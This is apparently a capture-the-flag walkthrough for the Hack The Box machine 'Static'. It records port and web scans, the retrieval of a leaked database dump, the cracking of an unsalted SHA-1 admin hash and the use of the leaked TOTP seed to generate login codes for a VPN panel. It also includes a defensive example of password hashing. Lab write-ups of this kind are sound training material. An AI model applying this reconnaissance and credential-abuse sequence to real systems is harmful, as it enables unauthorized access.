$ nmap -Pn 10.129.128.160
PORT STATE SERVICE
22/tcp open ssh
2222/tcp open EtherNetIP-1
8080/tcp open http-proxy
$ sudo nmap -p 2222 -T4 -A 10.129.128.160
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
| 256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_ 256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
$ sudo nmap -p 8080 -T4 -A 10.129.128.160
8080/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/vpn/ /.ftp_uploads/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
$ nikto -h http://10.129.128.160:8080
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server banner has changed from 'Apache/2.4.38 (Debian)' to 'Apache/2.4.29 (Ubuntu)' which may suggest a WAF, load balancer or proxy is in place
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/vpn/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ OSVDB-3268: /.ftp_uploads/: Directory indexing found.
+ Entry '/.ftp_uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
$ dirb 10.129.128.160:8080
---- Scanning URL: http://10.129.128.160:8080/ ----
+ http://10.129.128.160:8080/index.php (CODE:200|SIZE:0)
+ http://10.129.128.160:8080/robots.txt (CODE:200|SIZE:55)
+ http://10.129.128.160:8080/server-status (CODE:403|SIZE:281)
$ echo 10.129.129.126 static.htb | sudo tee -a /etc/hosts
OWASP ZAP (captured login POST, exported as curl):
http://10.129.128.160:8080/vpn/login.php
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Content-Length: 38' -H 'Referer: http://10.129.128.160:8080/vpn/login.php' -H 'Cookie: PHPSESSID=9agp3nerpthlsbl1rceh72or17' -H '' \
--data-binary $'username=ZAP&password=ZAP&submit=Login' \
'http://10.129.128.160:8080/vpn/login.php'
http://10.129.128.160:8080/.ftp_uploads/
http://10.129.128.160:8080/robots.txt
User-agent: *
Disallow: /vpn/
Disallow: /.ftp_uploads/
kali@kali:~/0.htb/machines/Static$ file db.sql.gz
db.sql.gz: gzip compressed data, was "db.sql", last modified: Thu Jun 18 15:43:42 2020, from Unix, original size modulo 2^32 355
kali@kali:~/0.htb/machines/Static/$ dos2unix -f db.sql.gz
kali@kali:~/0.htb/machines/Static/$ gunzip db.sql.gz
kali@kali:~/0.htb/machines/Static/$ cat db.sql
CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsigned not null auto_increment, username varchar(20) not null, password varchar(40) not null, totp varchar(16) not null, primary key (id) );
INSERT INTO users ( id, username, password, totp ) VALUES ( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', 'orxxi4c7orxwwzlo' );
CyberChef, Analyse hash:
d033e22ae348aeb5660fc2140aec35850c4da997
Hash length: 40
Byte length: 20
Bit length: 160
Based on the length, this hash could have been generated by one of the following hashing functions:
SHA-1
SHA-0
FSB-160
HAS-160
HAVAL-160
RIPEMD-160
Tiger-160
kali@kali:~/0.htb/machines/Static$ hashid d033e22ae348aeb5660fc2140aec35850c4da997
Analyzing 'd033e22ae348aeb5660fc2140aec35850c4da997'
[+] SHA-1
[+] Double SHA-1
[+] RIPEMD-160
[+] Haval-160
[+] Tiger-160
[+] HAS-160
[+] LinkedIn
[+] Skein-256(160)
[+] Skein-512(160)
kali@kali:~/0.htb/machines/Static$ hash-identifier
HASH: d033e22ae348aeb5660fc2140aec35850c4da997
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
decoded (hash lookup): admin
kali@kali:~/0.htb/machines/Static/$ echo -n admin | sha1deep
d033e22ae348aeb5660fc2140aec35850c4da997
kali@kali:~/0.htb/machines/Static/$ echo -n admin | sha1sum
d033e22ae348aeb5660fc2140aec35850c4da997 -
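The dumped users row stores a bare, unsalted SHA-1 of the password (which is why `echo -n admin | sha1sum` reproduces it instantly) next to a plaintext TOTP seed. The following is an added example, not part of the original notes: it confirms the match the way a defender would audit a leaked table, then shows the hardened storage form (per-user random salt plus scrypt) with a constant-time verify. The helper names are my own.

```python
import hashlib
import hmac
import os
from typing import Optional

# Value taken from the db.sql dump on the page; "admin" is the recovered password.
LEAKED_HASH = "d033e22ae348aeb5660fc2140aec35850c4da997"


def unsalted_sha1_matches(candidate: str, stored_hex: str) -> bool:
    """How the dumped schema stores passwords: sha1(password), no salt, no work
    factor. Anyone holding the table can recompute this in microseconds, so a
    leak of the row is effectively a leak of the password."""
    digest = hashlib.sha1(candidate.encode("utf-8")).hexdigest()
    return hmac.compare_digest(digest, stored_hex)


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Hardened form: 16-byte random salt per user and memory-hard scrypt,
    serialised as one self-describing string so parameters can be raised later.
    A fixed salt may be passed only to make tests deterministic."""
    salt = os.urandom(16) if salt is None else salt
    n, r, p = 2 ** 14, 8, 1  # ~16 MiB of memory per guess
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=n, r=r, p=p, dklen=32)
    return f"scrypt${n}${r}${p}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored parameters and compare in constant time."""
    try:
        algo, n, r, p, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
                            n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("leaked row is sha1('admin'):", unsalted_sha1_matches("admin", LEAKED_HASH))
    stored = hash_password("admin")
    print("hardened record:", stored)
    print("verify ok:", verify_password("admin", stored))
```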
http://10.129.129.90:8080/vpn/login.php
admin / admin
totp.py
import pyotp
# base32 seed taken from the totp column of the dumped users row
totp = pyotp.TOTP('orxxi4c7orxwwzlo')
print(totp.now())  # current 30-second code for the login form
http://10.129.129.90:8080/vpn/panel.php
Static Inc.
Internal IT Support portal
Common Name = Generate
Server Address Status
pub 172.17.0.10 Offline
web 172.20.0.10 Online
db 172.20.0.11 Online
vpn 172.30.0.1 Online
pki 192.168.254.3 Online
Five .ovpn files generated.